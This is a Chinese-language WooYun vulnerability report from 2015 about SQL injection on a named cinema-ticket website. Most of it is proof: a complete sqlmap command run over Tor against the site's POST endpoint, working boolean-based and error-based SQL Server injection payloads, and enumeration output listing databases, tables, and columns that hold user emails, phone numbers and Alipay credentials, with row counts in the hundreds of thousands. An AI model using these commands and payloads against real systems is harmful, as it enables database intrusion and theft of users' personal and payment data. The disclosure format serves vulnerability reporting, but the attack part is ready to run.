当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144698

漏洞标题:看购网存在SQL注入影响可导致数十万用户敏感用户数据泄露

相关厂商:看购网

漏洞作者: 路人甲

提交时间:2015-10-04 10:12

修复时间:2015-11-18 10:14

公开时间:2015-11-18 10:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看购网存在SQL注入影响可导致数十万用户敏感用户数据泄露

详细说明:

看购网存在SQL注入影响可导致数十万用户敏感用户数据泄露

漏洞证明:

仅证明漏洞存在,未dump任何用户资讯

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEU --union-char=N  -u &quot;</p><fieldset class='fieldset fieldset-mask'><legend>mask 区域</legend><pre>"http://bbs.kangou.cn/cinema/cinemainfo.aspx"&quot;</pre></fieldset><p class='detail'> --data="id=389ec2da-eabb-421c-806d-e39cb77dbf44&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab" --dbs --is-dba --current-db


---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=389ec2da-eabb-421c-806d-e39cb77dbf44' AND 6955=6955 AND 'UMSL'='UMSL&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=389ec2da-eabb-421c-806d-e39cb77dbf44' AND 3088=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3088=3088) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'gSXv'='gSXv&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab
---
current database: 'lookango'
current user is DBA: False
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] filminfo
[*] lkgimage
[*] lookango
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test1
[*] test2
Database: lookango
[113 tables]
+--------------------------------+
| DU_Applications |
| DU_Articles |
<...省略...>
| LKG_Gift |
| LKG_GiftCard |
| LKG_GiftCardBuy |
| LKG_GiftCardBuyOrder |
| LKG_GiftCardDiscount |
+--------------------------------+
在某个表中我发现竟然有支付宝帐号跟密码
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| AlipayID | nvarchar |
<...很神奇...>
| UserAlipayPass | nvarchar |
Database: lookango
Table: LKG_API_UserDatas
[12 columns]
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| API_Log_CardTID | uniqueidentifier |
| API_Log_Mail | nvarchar | ===>用户邮箱
| API_Log_Mobile | nvarchar | ===>用户手机
| API_Log_TicketCount | int |
| API_LogEvent | nvarchar |
| API_LogHashcodeIn | nvarchar |
| API_LogHashcodeOut | nvarchar |
| API_LogTime | datetime |
| API_UserID | nvarchar |
| API_UserIP | nvarchar |
| API_UserLogID | uniqueidentifier |
| API_UserOrderID | nvarchar |
+---------------------+------------------+
[14:55:04] [INFO] retrieved: 1185391
Database: lookango
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.LKG_API_UserDatas | 1185391 | ===>上百万数据
+-----------------------+---------+
Database: lookango
Table: LKG_CardOrders
[43 columns]
+---------------------------------+------------------+
| Column | Type |
+---------------------------------+------------------+
| billOrgId_i | nvarchar |
| CardCode | nvarchar |
| CardOrderCount | int |
| CardOrderID | uniqueidentifier |
| CardOrderIDCard | nvarchar |
| CardOrderMail | nvarchar | ===>用户邮箱
| CardOrderMoneyBackBalanceAfter | int |
| CardOrderMoneyBackBalanceBefore | int |
| CardOrderMoneyBackTime | datetime |
| CardOrderMoneyBackUserID | int |
| CardOrderMoneyIsBack | bit |
| CardOrderMonth | int |
| CardOrderNumber | nvarchar |
| CardOrderPassword | nvarchar |
| CardOrderPayKind | int |
| CardOrderPayTime | datetime |
| CardOrderPhone | nvarchar | ===>用户电话
| CardOrderPrice | int |
| CardOrderStatus | nvarchar |
| CardOrderTime | datetime |
| CardTongKindPosID |
| CheapCardID | uniqueidentifier |
| CheapPrice | int |
| CheapPriceBefore | int |
| CinemaId | uniqueidentifier |
| GHCardNumber | nvarchar |
| MaiZuoCinemaId | int |
| MaiZuoMaizuoSeq | nvarchar |
| MaiZuoRandCode | nvarchar |
| MaiZuoRemainingCount | int |
| MaiZuoResultMsg | nvarchar |
| MaiZuoStatus | int |
| MaiZuoTime | datetime |
| MerchantID | uniqueidentifier |
| merSysId | nvarchar |
| RelationUserID | uniqueidentifier |
| TuanGouID | uniqueidentifier |
| UserID | uniqueidentifier |
| UserIP | nvarchar |
| yinliangateId | nvarchar |
| yinlianUserId | nvarchar |
| YL_Order | nvarchar |
| yl_order_i | nvarchar |
+---------------------------------+------------------+
[15:23:12] [INFO] retrieved: 235359
Database: lookango
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| dbo.LKG_CardOrders | 235359 | ===>几十万数据
+--------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝